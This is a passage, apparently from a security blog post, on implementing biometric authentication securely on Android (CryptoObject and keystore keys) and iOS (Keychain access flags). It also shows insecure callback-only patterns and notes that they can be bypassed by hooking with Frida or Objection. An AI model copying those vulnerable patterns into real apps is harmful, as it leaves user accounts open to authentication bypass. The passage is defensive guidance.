</div><div><font face="arial"><span style="font-size: 14.6667px; white-space: pre-wrap;"><br /></span></font></div><div><font face="arial"><span style="font-size: 14.6667px; white-space: pre-wrap;">3) <b>setInvalidatedByBiometricEnrollment(true)</b>: available only from API level 24, when set to true, the key is irreversibly invalidated when a new biometric is enrolled, or when all existing biometrics are deleted. Consider that the value is true by default.</span></font></div>
<div><br /></div>
<div><br /></div>
<div>
<span style="font-family: arial; font-size: 11pt; white-space: pre-wrap;">Before authenticating the user with biometrics, the cipher should be initialized in order to check if the key is still valid. This can be done as follows:</span>
</div>
<div>
<span style="font-family: arial; font-size: 11pt; white-space: pre-wrap;"><br /></span>
</div>
<div>
<div dir="ltr" style="background: rgb(242, 242, 242); border: 1px solid rgb(140, 140, 140); line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; padding: 5px;">
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
public Cipher getCipherForBiometrics() {
</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
try {
</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
final Cipher cipher =
Cipher.getInstance(
</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
KeyProperties.KEY_ALGORITHM_AES + "/"
</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
+ KeyProperties.BLOCK_MODE_CBC + "/"
</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
+ KeyProperties.ENCRYPTION_PADDING_PKCS7);
</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
final SecretKey key;
</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
final KeyStore keyStore =
KeyStore.getInstance(“AndroidKeyStore”);
</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
keyStore.load(null);
</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
key = (SecretKey)
keyStore.getKey(KEY_ALIAS, null);
</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
cipher.init(Cipher.DECRYPT_MODE,
key);
</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
return cipher;
</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
} catch (KeyPermanentlyInvalidatedException e) {
</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
return null;
</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
} catch (KeyStoreException | CertificateException
| UnrecoverableKeyException | IOException
</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
|
NoSuchAlgorithmException | InvalidKeyException |
NoSuchPaddingException e) {
</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
throw new RuntimeException("Failed
to init Cipher", e);
</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
}
</div>
<div><br /></div>
</div>
</div>
<span id="docs-internal-guid-ddccb4dc-7fff-15a0-f809-26357e11d383"></span><br />
<div>
<span id="docs-internal-guid-0dcc4e6f-7fff-7bce-0c25-a0ec899a0bc8"><p dir="ltr" style="line-height: 1.38; margin-bottom: 12pt; margin-top: 12pt;">
<span style="font-family: arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Once the cipher is properly initialised it should be used as an argument for the authenticate method in order to start the biometric authentication flow.</span>
</p></span>
</div>
</div>
<div>
<div dir="ltr" style="background: rgb(242, 242, 242); border: 1px solid rgb(140, 140, 140); line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; padding: 5px;">
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
. . .
</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
Cipher cipher = getCipherForBiometrics();
</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
if (cipher != null) {
</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
biometricPrompt.authenticate(promptInfo, new
BiometricPrompt.CryptoObject(cipher));
</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
. . .
</div>
<div><br /></div>
</div>
</div>
<span id="docs-internal-guid-ddccb4dc-7fff-15a0-f809-26357e11d383"></span><br />
<div>
<span id="docs-internal-guid-cc69b288-7fff-3ba3-78bb-b5681090170d"><p dir="ltr" style="line-height: 1.38; margin-bottom: 12pt; margin-top: 12pt;">
<span style="font-family: arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">The biometric authentication flow is then managed by the Android platform, and the method </span><span style="font-family: arial; font-size: 11pt; font-style: italic; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">onAuthenticationSucceeded</span><span style="font-family: arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> is called upon a successful authentication. </span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 12pt; margin-top: 12pt;"><span style="font-family: arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">It is worth considering that this method can also be called by using hooking techniques and tools such as Frida. The difference between a valid authentication flow and a tampered authentication flow is the </span><span style="font-family: arial; font-size: 11pt; font-style: italic; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">BiometricPrompt.CryptoObject</span><span style="font-family: arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">.</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 12pt; margin-top: 12pt;">
<span style="font-family: arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Indeed, when a valid authentication flow is performed the Android platform properly instantiate the cipher contained within the </span><span style="font-family: arial; font-size: 11pt; font-style: italic; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">BiometricPrompt.CryptoObject</span><span style="font-family: arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">, and then this must be used to decrypt critical data such as the aforementioned authentication token. </span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 12pt; margin-top: 12pt;"><span style="font-family: arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Instead, when this method is called by using hooking techniques the cipher is not properly instantiated and when using it to decrypt the data, an exception will be raised.</span>
</p>
<div><br /></div></span>
<div dir="ltr" style="background: rgb(242, 242, 242); border: 1px solid rgb(140, 140, 140); line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; padding: 5px;">
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
@Override
</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
public void
onAuthenticationSucceeded(BiometricPrompt.AuthenticationResult
result) {
</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
Cipher cipher =
result.getCryptoObject().getCipher();
</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
byte[] decrypted =
cipher.doFinal(// get here authentication token encrypted);
</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
String authenticationToken =
decrypted.toString();
</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
// save the authentication token
somewhere
</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
. . .
</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
}
</div>
</div>
</div>
<span id="docs-internal-guid-ddccb4dc-7fff-15a0-f809-26357e11d383"></span>
<div><br /></div>
<span id="docs-internal-guid-7d63f8e1-7fff-7d0c-3b36-21d1db1ec584"><p dir="ltr" style="line-height: 1.38; margin-bottom: 12pt; margin-top: 12pt;">
<span style="font-family: arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">This implementation is secure even against hooking techniques because when calling the </span><span style="font-family: arial; font-size: 11pt; font-style: italic; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">onAuthenticationSucceeded</span><span style="font-family: arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> callback with Frida, the </span><span style="font-family: arial; font-size: 11pt; font-style: italic; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">AuthenticationResult </span><span style="font-family: arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">object does not contain a valid cipher instance since the used key, that has been defined as accessible only after a biometric authentication, has not been unlocked by the Android OS and the cipher will raise an Exception when trying to decrypt the data.</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 12pt; margin-top: 12pt;">
<span style="font-family: arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">During the various assessments performed on mobile applications we’ve found different insecure implementation of the biometric authentication that looks like the following one:</span>
</p>
</span>
<div dir="ltr" style="background: rgb(242, 242, 242); border: 1px solid rgb(140, 140, 140); line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; padding: 5px;">
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
@Override
</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
public void
onAuthenticationSucceeded(BiometricPrompt.AuthenticationResult
result) {
</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
enterApplication();
</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
}
</div>
</div>
</div>
<span id="docs-internal-guid-ddccb4dc-7fff-15a0-f809-26357e11d383"></span><br />
<div>
<span id="docs-internal-guid-8a95da69-7fff-0f0c-6bfe-c37e5e7bca04"><p dir="ltr" style="line-height: 1.38; margin-bottom: 12pt; margin-top: 12pt;">
<span style="font-family: arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">This kind of implementation is insecure since does not make use of the </span><span style="font-family: arial; font-size: 11pt; font-style: italic; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">BiometricPrompt.CryptoObject </span><span style="font-family: arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">contained in the </span><span style="font-family: arial; font-size: 11pt; font-style: italic; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">AuthenticationResult </span><span style="font-family: arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">object, but it assumes that the authentication has been properly validated since the method </span><span style="font-family: arial; font-size: 11pt; font-style: italic; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">onAuthenticationSucceeded </span><span style="font-family: arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">has been called and allows the user to enter the application.</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 12pt; margin-top: 12pt;">
<span style="font-family: arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">It is worth considering that even implementation that makes use of the </span><span style="font-family: arial; font-size: 11pt; font-style: italic; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">BiometricPrompt.CryptoObject </span><span style="font-family: arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">could be insecure if they do not decrypt data that are necessary to login the user (such as an authentication token, JWTs and so on). Indeed even Exceptions could be captured using hooking techniques and could be ignored in order to continue the application flow. </span>
</p>
<div><br /></div></span>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<h3 style="text-align: left;">Biometric Authentication in iOS</h3>
<div>
<span id="docs-internal-guid-ac6780aa-7fff-6c5d-5711-b4fa49a64e2f"><p dir="ltr" style="line-height: 1.38; margin-bottom: 12pt; margin-top: 12pt; text-align: justify;">
<span style="font-family: arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">The iOS platform introduced the biometric authentication starting from iPhone 5s in 2013. At that time it supported only the fingerprint authentication known as Touch ID.</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 12pt; margin-top: 12pt; text-align: justify;">
<span style="font-family: arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">When Apple released the iPhone X, the Face ID was added as biometric option that could be used to authenticate a user.</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 12pt; margin-top: 12pt; text-align: justify;">
<span style="font-family: arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">The biometric authentication flow is usually implemented with the </span><span style="font-family: arial; font-size: 11pt; font-style: italic; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">LocalAuthentication</span><span style="font-family: arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> framework. It is worth considering however that the </span><span style="font-family: arial; font-size: 11pt; font-style: italic; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">LocalAuthentication</span><span style="font-family: arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> framework is an event-based procedure and can be bypassed with hooking techniques and tools such as Frida or Objection.</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 12pt; margin-top: 12pt; text-align: justify;">
<span style="font-family: arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Unlike Android, the iOS platform allows to save arbitrary data within the Keychain defining the access criteria for every stored item.</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 12pt; margin-top: 12pt; text-align: justify;">
<span style="font-family: arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">In order to implement an effective biometric authentication, it is suggested to use the Keychain methods instead of the </span><span style="font-family: arial; font-size: 11pt; font-style: italic; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">LocalAuthentication</span><span style="font-family: arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> framework. Such approach consists in storing sensitive data (such as an authentication token) within the Keychain, and defining the proper access criteria so that the data can be used only after a successful biometric authentication.</span>
</p>
<span style="font-family: arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><div style="text-align: justify;"><span style="font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline;">In order to use the biometric authentication, it is required to check if the biometric hardware is available and if the user has enrolled biometric identitites. This can be done using the </span><span style="font-size: 11pt; font-style: italic; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline;">canEvaluatePolicy</span><span style="font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline;"> method as shown below:</span></div></span></span></div>
<div>
<span><span style="font-family: arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span></span>
</div>
<div>
<div dir="ltr" style="background: rgb(242, 242, 242); border: 1px solid rgb(140, 140, 140); line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; padding: 5px;">
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><font face="arial"><span style="font-size: 14.6667px; white-space: pre-wrap;">var error: NSError?
if context.canEvaluatePolicy(.deviceOwnerAuthenticationWithBiometrics, error: &error) {
// handle biometric authentication
. . .</span></font></div>
</div>
<span id="docs-internal-guid-ddccb4dc-7fff-15a0-f809-26357e11d383"></span><br />
<div>
<span id="docs-internal-guid-8a3c8997-7fff-09c9-da38-349449a5cbd9"><p dir="ltr" style="line-height: 1.38; margin-bottom: 12pt; margin-top: 12pt; text-align: justify;">
<span style="font-family: arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">The </span><span style="font-family: arial; font-size: 11pt; font-style: italic; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">canEvaluatePolicy</span><span style="font-family: arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> method with the </span><span style="font-family: arial; font-size: 11pt; font-style: italic; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">deviceOwnerAuthenticationWithBiometrics</span><span style="font-family: arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> flag, returns <i>true</i> only if the hardware to authenticate the user through biometrics is available and if the user has enrolled biometric factors.</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 12pt; margin-top: 12pt; text-align: justify;">
<span style="font-family: arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">When storing sensitive data for a biometric authentication within the Keychain it is recommended to use the following flags:</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 12pt; margin-top: 12pt; text-align: justify;">
<span style="font-family: arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">1)</span><span style="font-family: arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 700; vertical-align: baseline; white-space: pre-wrap;"> kSecAttrAccessibleWhenPasscodeSetThisDeviceOnly</span><span style="font-family: arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">: requires that a passcode is set on the device. The data is accessible only with the device unlocked and it is deleted when the user deactivates the passcode.</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 12pt; margin-top: 12pt; text-align: justify;">
<span style="font-family: arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">2) </span><span style="font-family: arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 700; vertical-align: baseline; white-space: pre-wrap;">kSecAccessControlBiometryCurrentSet/kSecAccessControlBiometryAny</span><span style="font-family: arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">: requires a user to authenticate with biometrics (e.g. Face ID or Touch ID) before accessing the data in the Keychain item. When using </span><span style="font-family: arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 700; vertical-align: baseline; white-space: pre-wrap;">kSecAccessControlBiometryCurrentSet, </span><span style="font-family: arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">whenever the user adds a fingerprint or facial representation to the device, it will automatically invalidate the entry in the Keychain. This makes sure that the keychain item can only be unlocked by users that were enrolled when the item was added to the keychain.</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 12pt; margin-top: 12pt; text-align: justify;">
<span style="font-family: arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">The usage of the other flags should be avoided when storing data relative to biometric authentication since they do not mandatory require the usage of biometric factors to retrieve the data when accessing the application.</span>
</p>
<div style="text-align: justify;">
<span style="font-family: arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span></div></span><div style="text-align: justify;"><span style="font-family: arial; font-size: 11pt; white-space: pre-wrap;">Following it is reported an example on how to securely save data in the Keychain for biometric authentication:</span></div>
</div>
<div><br /></div>
<div>
<div dir="ltr" style="background: rgb(242, 242, 242); border: 1px solid rgb(140, 140, 140); line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; padding: 5px;">
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
var error: Unmanaged<CFError>?
</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
guard let accessControl =
SecAccessControlCreateWithFlags(kCFAllocatorDefault,
</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
kSecAttrAccessibleWhenPasscodeSetThisDeviceOnly,
</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
SecAccessControlCreateFlags.biometryCurrentSet,
</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
&error) else {
</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
// failed to create AccessControl object
</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
return
</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
}
</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
var query: [String: Any] = [:]
</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
query[kSecClass as String] = kSecClassGenericPassword
</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
query[kSecAttrLabel as String] = "label_for_auth_token" as
CFString
</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
query[kSecAttrAccount as String] = "App Account" as CFString
</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
query[kSecValueData as String] =
"here_goes_auth_token".data(using: .utf8)! as CFData
</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
query[kSecAttrAccessControl as String] = accessControl
</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<br />
</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
let status = SecItemAdd(query as CFDictionary, nil)
</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
if status == noErr {
</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
// successfully saved
</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
} else {
</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
// error while saving
</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
}
</div>
</div>
</div>
<span id="docs-internal-guid-ddccb4dc-7fff-15a0-f809-26357e11d383"></span><br />
<div><div style="text-align: justify;"><span style="font-family: arial; font-size: 11pt; white-space: pre-wrap;">When requesting the sensitive data, the iOS platform will ask for biometric authentication returning data or nil depending if the biometric authentication was successful or not.</span></div>
<div style="text-align: justify;"><br /></div>
</div>
<div>
<span id="docs-internal-guid-2c94db66-7fff-407d-67c8-b75ce6ff43ea"><p dir="ltr" style="line-height: 1.38; margin-bottom: 12pt; margin-top: 12pt; text-align: justify;">
<span style="font-family: arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">During the various assessments performed on mobile applications we’ve found different insecure implementation of the biometric authentication that make use of the <i>evaluatePolicy</i> method and are similar to the following one:</span>
</p>
<div><div dir="ltr" style="background: rgb(242, 242, 242); border: 1px solid rgb(140, 140, 140); line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; padding: 5px;"><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">let context = LAContext()</div><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">var error: NSError?</div><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">context.evaluatePolicy(.deviceOwnerAuthenticationWithBiometrics, localizedReason: "Authenticate with biometrrics to access the application") { success, evaluationError in</div><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> guard success else {</div><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> // Authentication Failed</div><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> }</div><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> enterApplication();</div><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">}</div></div>
</div>
<span id="docs-internal-guid-ddccb4dc-7fff-15a0-f809-26357e11d383"></span><br />
<div>
<br />
<span id="docs-internal-guid-084ce31f-7fff-78eb-f000-22bf30caa044"><p dir="ltr" style="line-height: 1.38; margin-bottom: 12pt; margin-top: 12pt; text-align: justify;"><span style="font-family: arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">This kind of implementation is insecure since does not make use of the Keychain, but it assumes that the authentication has been properly validated since the success condition has been met and allows the user to use the application.</span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 12pt; margin-top: 12pt; text-align: justify;"><span style="font-family: arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Using hooking techniques or tools such as Frida or Objection this kind of implementation could be bypassed without providing a valid biometric authentication.</span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 12pt; margin-top: 12pt; text-align: justify;"><span style="font-family: arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">It is worth considering that even implementations that make use of the Keychain could be bypassed if the proper flags are not set when storing the data in it. </span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 12pt; margin-top: 12pt; text-align: justify;"><span style="font-family: arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Specifically the usage of the flag </span><span style="font-family: arial; font-size: 11pt; font-style: italic; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">kSecAttrAccessibleWhenUnlockedThisDeviceOnly</span><span style="font-family: arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> and </span><span style="font-family: arial; font-size: 11pt; font-style: italic; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">kSecAttrAccessibleAfterFirstUnlockThisDeviceOnly</span><span style="font-family: arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> should be avoided since they do not require that a passcode has been previously set on the device and does not delete the data when the passcode is disabled. Furthermore if the device has no passcode, the data is always accessible since the device is considered always unlocked.</span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 12pt; margin-top: 12pt; text-align: justify;"><span style="font-family: arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Finally the usage of the other <i>SecAccessControlCreateFlags</i>, except for the aforementioned <i>kSecAccessControlBiometryCurrentSet/kSecAccessControlBiometryAny</i> should be avoided since they do not mandatory require a biometric authentication. Indeed the device passcode could be used as well.</span></p><div><span style="font-family: arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span></div></span></div>
</div></span>
</div>
</div>
<div><br /></div></div>
<h3 style="text-align: left;">Conclusions</h3>
